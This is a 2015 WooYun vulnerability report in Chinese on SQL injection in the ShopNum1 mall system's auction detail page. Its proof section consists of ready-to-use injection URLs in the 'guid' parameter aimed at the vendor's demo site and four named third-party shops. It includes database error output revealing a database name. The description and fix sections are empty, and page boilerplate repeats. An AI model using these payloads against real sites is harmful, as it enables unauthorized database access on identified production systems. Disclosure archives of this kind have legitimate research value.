武汉群翔软件有限公司商城系统注入之八（官方演示复现） | wooyun-2015-0119485

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0119485

漏洞标题：

武汉群翔软件有限公司商城系统注入之八（官方演示复现）

漏洞详情

披露状态：

2015-06-10：细节已通知厂商并且等待厂商处理中
2015-06-15：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2015-08-09：细节向核心白帽子及相关领域专家公开
2015-08-19：细节向普通白帽子公开
2015-08-29：细节向实习白帽子公开
2015-09-13：细节向公众公开

简要描述：

.......

详细说明：

................

漏洞证明：

就发官方演示站的一枚吧
http://nrqiang.shopnum1.com//AuctionInfoDetail01.aspx?guid=a4d47c1d-b78e-4a3d-bae8-2a46187d0112%27%20anD%20quotename(db_name())%3E0%20aNd%20%27s%27%20lIke%20%27s
【 友情提示 】
很抱歉，您要访问的页面无法正确显示，可能是因为如下原因：
1 . 系统过于繁忙，请点击浏览器的“刷新”按钮，或稍后再试。
2 . 您输入的网址有误，请重新检查您输入的网址。 
3 . 此页面已经删除，请访问其他页面。 
4 . 此页遭到非法访问，被程序自动屏蔽。 
SELECT Guid,Name,Memo FROM ShopNum1_AuctionInfo WHERE Guid ='a4d47c1d-b78e-4a3d-bae8-2a46187d0112' anD quotename(db_name())>0 aNd 's' lIke 's'_在将 nvarchar 值 '[v81fx.groupfly.cn]' 转换成数据类型 int 时失败。
以下四枚就不截图了 
http://www.19218.com//AuctionInfoDetail01.aspx?guid=a4d47c1d-b78e-4a3d-bae8-2a46187d0112'%20anD%20quotename(db_name())%3E0%20aNd%20's'%20lIke%20's
http://www.xiangliangan.com//AuctionInfoDetail01.aspx?guid=a4d47c1d-b78e-4a3d-bae8-2a46187d0112'%20anD%20quotename(db_name())%3E0%20aNd%20's'%20lIke%20's
http://www.taobaovp.com//AuctionInfoDetail01.aspx?guid=a4d47c1d-b78e-4a3d-bae8-2a46187d0112'%20anD%20quotename(db_name())%3E0%20aNd%20's'%20lIke%20's
http://www.360eat.cn//AuctionInfoDetail01.aspx?guid=a4d47c1d-b78e-4a3d-bae8-2a46187d0112'%20anD%20quotename(db_name())%3E0%20aNd%20's'%20lIke%20's

修复方案：

.................

版权声明：转载请注明来源雅柏菲卡@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-09-13 12:49

厂商回复：

漏洞Rank：2 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源雅柏菲卡@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源雅柏菲卡@乌云